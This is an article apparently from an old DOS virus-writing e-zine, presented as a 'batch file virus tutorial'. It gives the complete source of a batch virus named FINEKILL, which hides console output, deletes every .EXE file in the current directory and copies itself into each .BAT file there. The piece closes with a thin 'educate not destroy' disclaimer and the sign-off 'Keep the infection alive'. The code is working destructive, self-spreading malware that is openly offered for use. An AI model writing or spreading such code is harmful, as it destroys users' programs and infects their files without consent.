ÄÄÄÄÄÄ[P.V.M.004]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
                         A BATCH FILE VIRUS TUTORIAL
               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
                     ( This one's for the DOS lovers ...)

 This is an example of a batch file virus :

 Name of Virus : FINEKILL
 Source :

          @echo off
          @ctty nul
          @del *.exe
          @for %%f in (*.bat) do copy %%f + FINEKILL.BAT
          @ctty con
          ^z

 This virus infects all batch files in tyhe current directory and deletes all
 ".EXE" files .Simple ,but destructive .Now you know how easy it is to write a
 simple virus . Now don't go out and tell someone that you made this virus and
 then infect all of their files , remember the purpose of this magazine is to
 EDUCATE AND INFORM NOT DESTROY !!!


 " Keep the infection alive ... "

                                            - Zoom23

           ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ P.V.M.#1 ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
